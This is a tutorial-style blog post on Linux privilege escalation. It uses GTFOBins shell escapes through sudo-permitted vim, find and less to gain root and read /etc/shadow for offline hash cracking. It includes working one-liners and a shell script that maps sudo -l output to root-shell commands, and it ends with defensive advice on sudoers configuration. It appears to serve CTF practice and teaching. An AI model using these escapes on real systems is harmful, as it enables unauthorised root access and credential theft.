Oh! Didn’t see you there. You may wonder how you can get root access as quickly as the blink of an eye… So you are in the right place.
What do I mean by ‘root access’?
You may be familiar with the Windows Administrator account. Like root on Unix, it is a superuser account intended for system administration: it can perform any task without being blocked for lack of permissions.
Alright, let’s go to the fun part. Achieving the root user.
Let’s say you have a shell on a server, and you just need that juicy shadow file (/etc/shadow) so you can crack its password hashes offline.
So you are stuck as this poor low-privileged user called Simba (just like my cat, what a coincidence!) and you try to read the shadow file on the server.
Oh shoot! Permission denied: we don’t have enough privileges to read it. What can we do now?
Well, the sudo command has a -l (--list) option that shows which commands the current user is allowed (and forbidden) to run as other users, root included.
So let’s try it out!
As we can see, the interesting part is at the bottom of the command output. It says that simba, a non-root user, can execute 3 commands with root permissions. Have you spotted them already?
The find, less and vim commands. They don’t seem harmful at all!
Not yet, but bear with me for a little longer. Now is the time when this amazing database of Unix binaries comes into play.
As its page says, “GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.” For every binary it lists which features (shell escapes, file reads and writes, and so on) can be abused under sudo, SUID, capabilities and other contexts, and thanks to this list we have an advantage in getting our precious root privilege.
Let the fun begin
So, now having our sudo available commands, and the magic list, let’s see how we can make good use of them.
Let’s start with the vim binary. You can now try the privilege escalation yourself alongside simba.
1. Go to the GTFOBins page and look for the sudo section of the vim entry (https://gtfobins.github.io/gtfobins/vim/).
2. There you will see several vim commands that, depending on the system, will give us root access. For now, option (a) is enough: it starts vim as root and runs a shell command from inside it (at the time of writing, sudo vim -c ':!/bin/sh').
3. Time to try it on our console!
And just like a magic trick, we made Simba disappear and made the root account appear instead! (A quick id or whoami in the new shell confirms it.)
Will we be able to see the contents of the server’s shadow file now that we have gained root privileges? There is only one way to find out… and indeed, we now have in our hands what we wanted.
Want to keep hacking?
Let’s try it one more time with another command Simba has available.
This time, Simba will choose to exploit the find binary. So, again, we head to https://gtfobins.github.io/ and search for the sudo section of the find entry (https://gtfobins.github.io/gtfobins/find/), which uses find’s -exec action to run a shell as root.
And now we will again try to exploit this in order to escalate privileges.
Incredibly simple, right?
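To make the routine from the two walkthroughs above repeatable, here is an added example (not part of the original post) that triages a saved copy of sudo -l output: it extracts every binary the user may run as root and, for the ones covered by GTFOBins’ sudo entries, prints the matching shell-escape one-liner. The sudo -l text, the host name target and the paths are constructed for the example; the escape commands are the ones GTFOBins documents for vim, find and less.

```shell
#!/bin/sh
# Added example: triage `sudo -l` output against a small GTFOBins "sudo" table.
# Not code from the original post. Sample data below is constructed.

# Constructed `sudo -l` output for user simba on an assumed host "target".
SAMPLE_SUDO_L='Matching Defaults entries for simba on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User simba may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl'

# root_commands TEXT: print the basename of each command runnable as root
# (or "ALL" for an unrestricted rule), one per line. Only lines whose
# run-as spec is (root ...) or (ALL ...) are considered.
root_commands() {
    printf '%s\n' "$1" | awk '/^[[:space:]]*\((root|ALL)[^)]*\)/ {
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^\//) { n = split($i, p, "/"); print p[n]; next }
            if ($i == "ALL") { print "ALL"; next }
        }
    }'
}

# gtfobins_sudo_escape NAME: print the GTFOBins sudo escape for NAME.
# The table only covers the binaries from the post plus the "ALL" rule;
# returns 1 for anything else so the caller can look it up manually.
gtfobins_sudo_escape() {
    case "$1" in
        vim)  echo "sudo vim -c ':!/bin/sh'" ;;
        find) echo "sudo find . -exec /bin/sh \\; -quit" ;;
        less) echo "sudo less /etc/profile   # then type !/bin/sh at the less prompt" ;;
        ALL)  echo "sudo /bin/sh" ;;
        *)    return 1 ;;
    esac
}

# triage TEXT: one line per root-runnable command with its escape, if known.
triage() {
    root_commands "$1" | while IFS= read -r cmd; do
        if esc=$(gtfobins_sudo_escape "$cmd"); then
            printf '%-10s -> %s\n' "$cmd" "$esc"
        else
            printf '%-10s -> not in this table; check https://gtfobins.github.io/gtfobins/%s/\n' "$cmd" "$cmd"
        fi
    done
}

# On a real box: sudo -l > /tmp/sudo-l.txt; triage "$(cat /tmp/sudo-l.txt)"
triage "$SAMPLE_SUDO_L"
```

Two practical notes: entries without NOPASSWD still require Simba’s own password, so the trick only helps when you know it; and rules that pin arguments (for example a fixed path after the binary) may not allow the GTFOBins variant as written, so always read the full rule, not just the binary name.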
So now, you and simba know how to gain root access when a low-privileged user has binaries it can run as root due to a sudoers misconfiguration. The lesson for the defender is the mirror image: any binary that can spawn a shell or open arbitrary files (editors, pagers, find, interpreters) must never be granted via sudo, and sudoedit should be used instead of sudo vim. It is time to play some CTFs with this trick up our sleeve!